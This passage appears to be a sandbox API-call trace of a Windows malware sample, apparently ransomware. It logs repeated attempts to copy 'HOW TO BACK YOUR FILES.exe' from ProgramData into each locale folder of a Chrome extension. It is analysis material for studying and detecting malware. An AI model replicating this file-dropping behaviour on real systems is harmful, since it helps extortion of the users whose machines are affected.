Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0104.841] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.842] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.843] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.843] GetLastError () returned 0x0 [0104.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.844] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.846] CloseHandle (hObject=0x120) returned 1 [0104.846] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834852a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6f3120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6f3120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.846] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.846] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.848] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0104.851] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0104.851] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.851] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.851] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.852] GetLastError () returned 0x0 [0104.852] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.852] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.852] CloseHandle (hObject=0x120) returned 1 [0104.852] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.852] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8347dd70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6f3120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6f3120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.852] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.852] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.852] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0104.853] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0104.853] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.853] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.853] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.854] GetLastError () returned 0x0 [0104.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.854] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.854] CloseHandle (hObject=0x120) returned 1 [0104.854] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83476840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d719280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d719280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.854] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.854] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.854] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0104.854] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0104.854] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.854] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.855] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.855] GetLastError () returned 0x0 [0104.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.855] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.855] CloseHandle (hObject=0x120) returned 1 [0104.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83467de0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d719280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d719280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.856] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.856] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0104.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0104.856] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.856] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.857] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.857] GetLastError () returned 0x0 [0104.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.857] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.857] CloseHandle (hObject=0x120) returned 1 [0104.857] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.857] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834608b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d73f3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d73f3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.858] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.858] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.858] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0104.858] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0104.858] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.858] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.859] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.859] GetLastError () returned 0x0 [0104.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.859] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.859] CloseHandle (hObject=0x120) returned 1 [0104.859] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.859] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83459380, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d73f3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d73f3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.859] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.859] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.860] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0104.860] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0104.860] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.860] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.861] GetLastError () returned 0x0 [0104.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.861] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.861] CloseHandle (hObject=0x120) returned 1 [0104.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83451e50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d765540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d765540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 